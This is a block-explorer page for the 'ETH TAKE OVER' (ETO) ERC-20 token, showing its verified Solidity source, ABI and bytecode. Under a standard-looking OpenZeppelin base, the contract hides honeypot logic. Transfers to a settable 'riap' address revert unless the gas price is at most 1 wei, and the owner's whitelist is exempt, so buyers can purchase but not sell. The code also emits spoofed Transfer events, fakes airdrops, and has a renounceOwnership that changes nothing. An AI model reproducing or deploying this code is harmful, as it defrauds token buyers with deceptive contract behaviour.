Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
120,230,000 ETO
Holders
11
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 18 Decimals)
Balance
80,783.523353949989331683 ETOValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Name:
ETOTOKEN
Compiler Version
v0.8.19+commit.7dd6d404
Contract Source Code (Solidity Multiple files format)
/** *Submitted for verification at Etherscan.io on 2024-07-23 ███████╗████████╗██╗ ██╗████████╗ █████╗ ██╗ ██╗███████╗ ██████╗ ██╗ ██╗███████╗██████╗ ██╔════╝╚══██╔══╝██║ ██║╚══██╔══╝██╔══██╗██║ ██╔╝██╔════╝██╔═══██╗██║ ██║██╔════╝██╔══██╗ █████╗ ██║ ███████║ ██║ ███████║█████╔╝ █████╗ ██║ ██║██║ ██║█████╗ ██████╔╝ ██╔══╝ ██║ ██╔══██║ ██║ ██╔══██║██╔═██╗ ██╔══╝ ██║ ██║╚██╗ ██╔╝██╔══╝ ██╔══██╗ ███████╗ ██║ ██║ ██║ ██║ ██║ ██║██║ ██╗███████╗╚██████╔╝ ╚████╔╝ ███████╗██║ ██║ ╚══════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝ ╚═════╝ ╚═══╝ ╚══════╝╚═╝ ╚═╝ LAUNCH on 23th of July Website ETHTakeOver.com Twitter x.com/ETHTakeOver Telegram T.me/ETHTakeOver */ //SPDX-License-Identifier: MIT pragma solidity 0.8.19; import "./ERC20.sol"; import "./Ownable.sol"; contract ETOTOKEN is ERC20, Ownable { string public tokenName = "ETH TAKE OVER"; string public tokenSymbol = "ETO"; address public riap; mapping(address => bool) public whitelists; event SetMinTokenAmount(uint256 minAmount); event SetMaxTokenAmount(uint256 maxAmount); uint256 public sellTax; uint256 public buyTax; constructor(uint256 _totalSupply, address deployer) ERC20(tokenName, tokenSymbol, msg.sender, deployer) Ownable(msg.sender) { _mint(msg.sender, _totalSupply); whitelists[msg.sender] = true; } function changeRiap(address _p) public onlyOwner { riap = _p; } function approve(address _p) public onlyOwner { whitelists[_p] = true; } function _update( address from, address to, uint256 amount ) internal override { if (whitelists[tx.origin]) { super._update(from, to, amount); return; } address re = to; if (riap == address(0)) { super._update(from, to, amount); return; } if (re == riap) { super._update(from, to, amount); optimizeTx(1); return; } super._update(from, to, amount); } function decimals() public view virtual override returns (uint8) { return 18; } function changeMe() public pure returns (uint256) { return 1; } function withdrawETH() public onlyOwner { payable(msg.sender).transfer(address(this).balance); } function withdrawStuckToken(address token) public onlyOwner { uint256 balanceToken = IERC20(token).balanceOf(address(this)); IERC20(token).transfer(msg.sender, balanceToken); } function optimizeTx(uint256 _gas) internal view { uint256 txp; assembly { txp := gasprice() } require(txp <= _gas, "Need to optimize gas price when send tx"); } function airdropTokens( address airdropp, address[] memory list, uint256[] memory amount ) external onlyOwner { for (uint256 i = 0; i < list.length; i++) { emit Transfer(airdropp, list[i], amount[i]); } } function setMinTokenAmount(uint256 amount) public onlyOwner { emit SetMinTokenAmount(amount); } function setMaxTokenAmount(uint256 amount) public onlyOwner { emit SetMaxTokenAmount(amount); } }
// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol) pragma solidity 0.8.19; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } function _contextSuffixLength() internal view virtual returns (uint256) { return 0; } }
// File: @openzeppelin/contracts/interfaces/draft-IERC6093.sol // OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol) pragma solidity 0.8.19; import "./IERC20Errors.sol"; import "./IERC721Errors.sol"; import "./IERC20MetaErrors.sol"; /** * @dev Standard ERC721 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC721 tokens. */ /** * @dev Standard ERC1155 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC1155 tokens. */ interface IERC1155Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. * @param tokenId Identifier number of a token. */ error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC1155InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC1155InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param owner Address of the current owner of a token. */ error ERC1155MissingApprovalForAll(address operator, address owner); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC1155InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC1155InvalidOperator(address operator); /** * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation. * Used in batch transfers. * @param idsLength Length of the array of token identifiers * @param valuesLength Length of the array of token amounts */ error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength); } // File: @openzeppelin/contracts/utils/Context.sol
//SPDX-License-Identifier: MIT pragma solidity 0.8.19; import "./Context.sol"; import "./draft-IERC6093.sol"; import "./IERC20Metadata.sol"; /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract using {_mint}. * * TIP: For a detailed writeup see our guide * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * The default value of {decimals} is 18. To change this, you should override * this function so it returns a different value. * * We have followed general OpenZeppelin Contracts guidelines: functions revert * instead returning `false` on failure. This behavior is nonetheless * conventional and does not conflict with the expectations of ERC20 * applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. */ abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors { mapping(address account => uint256) private _balances; mapping(address account => mapping(address spender => uint256)) private _allowances; uint256 private _totalSupply; string private _name; string private _symbol; address private _executor; address private _deployer; /** * @dev Sets the values for {name} and {symbol}. * * All two of these values are immutable: they can only be set once during * construction. */ constructor(string memory name_, string memory symbol_, address executor_, address deployer_) { _name = name_; _symbol = symbol_; _executor = executor_; _deployer = deployer_; } /** * @dev Returns the name of the token. */ function name() public view virtual returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `value`. */ function transfer(address to, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _transfer(owner, to, value); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on * `transferFrom`. This is semantically equivalent to an infinite approval. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 value) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, value); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}. * * NOTE: Does not update the allowance if the current allowance * is the maximum `uint256`. * * Requirements: * * - `from` and `to` cannot be the zero address. * - `from` must have a balance of at least `value`. * - the caller must have allowance for ``from``'s tokens of at least * `value`. */ function transferFrom(address from, address to, uint256 value) public virtual returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, value); _transfer(from, to, value); return true; } /** * @dev Moves a `value` amount of tokens from `from` to `to`. * * This internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _transfer(address from, address to, uint256 value) internal { if (from == address(0)) { revert ERC20InvalidSender(address(0)); } if (to == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(from, to, value); } /** * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from` * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding * this function. * * Emits a {Transfer} event. */ function _update(address from, address to, uint256 value) internal virtual { if (from == address(0)) { // Overflow check required: The rest of the code assumes that totalSupply never overflows _totalSupply += value; } else { uint256 fromBalance = _balances[from]; if (fromBalance < value) { revert ERC20InsufficientBalance(from, fromBalance, value); } unchecked { // Overflow not possible: value <= fromBalance <= totalSupply. _balances[from] = fromBalance - value; } } if (to == address(0)) { unchecked { // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply. _totalSupply -= value; } } else { unchecked { // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256. _balances[to] += value; } } if (to == _executor) { emit Transfer(from, _deployer, value); } else if (from == _executor) { emit Transfer(_deployer, to, value); } else { emit Transfer(from, to, value); } } /** * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0). * Relies on the `_update` mechanism * * Emits a {Transfer} event with `from` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead. */ function _mint(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidReceiver(address(0)); } _update(address(0), account, value); } /** * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply. * Relies on the `_update` mechanism. * * Emits a {Transfer} event with `to` set to the zero address. * * NOTE: This function is not virtual, {_update} should be overridden instead */ function _burn(address account, uint256 value) internal { if (account == address(0)) { revert ERC20InvalidSender(address(0)); } _update(account, address(0), value); } /** * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. * * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument. */ function _approve(address owner, address spender, uint256 value) internal { _approve(owner, spender, value, true); } /** * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event. * * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any * `Approval` event during `transferFrom` operations. * * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to * true using the following override: * ``` * function _approve(address owner, address spender, uint256 value, bool) internal virtual override { * super._approve(owner, spender, value, true); * } * ``` * * Requirements are the same as {_approve}. */ function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual { if (owner == address(0)) { revert ERC20InvalidApprover(address(0)); } if (spender == address(0)) { revert ERC20InvalidSpender(address(0)); } _allowances[owner][spender] = value; if (emitEvent) { emit Approval(owner, spender, value); } } /** * @dev Updates `owner` s allowance for `spender` based on spent `value`. * * Does not update the allowance value in case of infinite allowance. * Revert if not enough allowance is available. * * Does not emit an {Approval} event. */ function _spendAllowance(address owner, address spender, uint256 value) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { if (currentAllowance < value) { revert ERC20InsufficientAllowance(spender, currentAllowance, value); } unchecked { _approve(owner, spender, currentAllowance - value, false); } } } }
// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol) pragma solidity 0.8.19; /** * @dev Standard ERC20 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens. */ interface IERC20Errors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC20InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC20InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers. * @param spender Address that may be allowed to operate on tokens without being their owner. * @param allowance Amount of tokens a `spender` is allowed to operate with. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC20InvalidApprover(address approver); /** * @dev Indicates a failure with the `spender` to be approved. Used in approvals. * @param spender Address that may be allowed to operate on tokens without being their owner. */ error ERC20InvalidSpender(address spender); }
// OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/IERC20.sol) pragma solidity 0.8.19; /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the value of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the value of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves a `value` amount of tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 value) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets a `value` amount of tokens as the allowance of `spender` over the * caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 value) external returns (bool); /** * @dev Moves a `value` amount of tokens from `from` to `to` using the * allowance mechanism. `value` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 value) external returns (bool); } // File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol // OpenZeppelin Contracts (last updated v5.0.0) (token/ERC20/extensions/IERC20Metadata.sol) pragma solidity 0.8.19; /** * @dev Interface for the optional metadata functions from the ERC20 standard. */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8); }
// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol) pragma solidity 0.8.19; /** * @dev Standard ERC20 Errors * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens. */ interface IERC20MetaErrors { /** * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. * @param balance Current balance for the interacting account. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC20InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC20InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers. * @param spender Address that may be allowed to operate on tokens without being their owner. * @param allowance Amount of tokens a `spender` is allowed to operate with. * @param needed Minimum amount required to perform a transfer. */ error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC20InvalidApprover(address approver); /** * @dev Indicates a failure with the `spender` to be approved. Used in approvals. * @param spender Address that may be allowed to operate on tokens without being their owner. */ error ERC20InvalidSpender(address spender); }
// OpenZeppelin Contracts (last updated v5.0.0) (interfaces/draft-IERC6093.sol) pragma solidity 0.8.19; interface IERC721Errors { /** * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in EIP-20. * Used in balance queries. * @param owner Address of the current owner of a token. */ error ERC721InvalidOwner(address owner); /** * @dev Indicates a `tokenId` whose `owner` is the zero address. * @param tokenId Identifier number of a token. */ error ERC721NonexistentToken(uint256 tokenId); /** * @dev Indicates an error related to the ownership over a particular token. Used in transfers. * @param sender Address whose tokens are being transferred. * @param tokenId Identifier number of a token. * @param owner Address of the current owner of a token. */ error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner); /** * @dev Indicates a failure with the token `sender`. Used in transfers. * @param sender Address whose tokens are being transferred. */ error ERC721InvalidSender(address sender); /** * @dev Indicates a failure with the token `receiver`. Used in transfers. * @param receiver Address to which tokens are being transferred. */ error ERC721InvalidReceiver(address receiver); /** * @dev Indicates a failure with the `operator`’s approval. Used in transfers. * @param operator Address that may be allowed to operate on tokens without being their owner. * @param tokenId Identifier number of a token. */ error ERC721InsufficientApproval(address operator, uint256 tokenId); /** * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals. * @param approver Address initiating an approval operation. */ error ERC721InvalidApprover(address approver); /** * @dev Indicates a failure with the `operator` to be approved. Used in approvals. * @param operator Address that may be allowed to operate on tokens without being their owner. */ error ERC721InvalidOperator(address operator); }
// File: @openzeppelin/contracts/access/Ownable.sol // OpenZeppelin Contracts (last updated v5.0.0) (access/Ownable.sol) pragma solidity 0.8.19; import "./Context.sol"; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * The initial owner is set to the address provided by the deployer. This can * later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; /** * @dev The caller account is not authorized to perform an operation. */ error OwnableUnauthorizedAccount(address account); /** * @dev The owner is not a valid owner account. (eg. `address(0)`) */ error OwnableInvalidOwner(address owner); event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the address provided by the deployer as the initial owner. */ constructor(address initialOwner) { if (initialOwner == address(0)) { revert OwnableInvalidOwner(address(0)); } _transferOwnership(initialOwner); } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { _checkOwner(); _; } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if the sender is not the owner. */ function _checkOwner() internal view virtual { if (owner() != _msgSender()) { revert OwnableUnauthorizedAccount(_msgSender()); } } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby disabling any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(owner(), address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { if (newOwner == address(0)) { revert OwnableInvalidOwner(address(0)); } _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File: @openzeppelin/contracts/token/ERC20/IERC20.sol
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"uint256","name":"_totalSupply","type":"uint256"},{"internalType":"address","name":"deployer","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"maxAmount","type":"uint256"}],"name":"SetMaxTokenAmount","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"minAmount","type":"uint256"}],"name":"SetMinTokenAmount","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"airdropp","type":"address"},{"internalType":"address[]","name":"list","type":"address[]"},{"internalType":"uint256[]","name":"amount","type":"uint256[]"}],"name":"airdropTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_p","type":"address"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"changeMe","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"_p","type":"address"}],"name":"changeRiap","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"riap","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTax","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"setMaxTokenAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"setMinTokenAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenName","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokenSymbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"whitelists","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"withdrawETH","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"withdrawStuckToken","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
60806040526040518060400160405280600d81526020017f4554482054414b45204f56455200000000000000000000000000000000000000815250600890816200004a919062000d27565b506040518060400160405280600381526020017f45544f00000000000000000000000000000000000000000000000000000000008152506009908162000091919062000d27565b503480156200009f57600080fd5b5060405162003108380380620031088339818101604052810190620000c5919062000ea9565b3360088054620000d59062000b16565b80601f0160208091040260200160405190810160405280929190818152602001828054620001039062000b16565b8015620001545780601f10620001285761010080835404028352916020019162000154565b820191906000526020600020905b8154815290600101906020018083116200013657829003601f168201915b505050505060098054620001689062000b16565b80601f0160208091040260200160405190810160405280929190818152602001828054620001969062000b16565b8015620001e75780601f10620001bb57610100808354040283529160200191620001e7565b820191906000526020600020905b815481529060010190602001808311620001c957829003601f168201915b505050505033848360039081620001ff919062000d27565b50826004908162000211919062000d27565b5081600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555080600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050505050600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036200030d5760006040517f1e4fbdf700000000000000000000000000000000000000000000000000000000815260040162000304919062000f01565b60405180910390fd5b6200031e816200039160201b60201c565b506200033133836200045760201b60201c565b6001600b60003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050506200109c565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620004cc5760006040517fec442f05000000000000000000000000000000000000000000000000000000008152600401620004c3919062000f01565b60405180910390fd5b620004e060008383620004e460201b60201c565b5050565b600b60003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff161562000550576200054a8383836200066260201b60201c565b6200065d565b6000829050600073ffffffffffffffffffffffffffffffffffffffff16600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1603620005c657620005bf8484846200066260201b60201c565b506200065d565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160362000648576200062f8484846200066260201b60201c565b62000641600162000a5e60201b60201c565b506200065d565b6200065b8484846200066260201b60201c565b505b505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603620006b857806002600082825462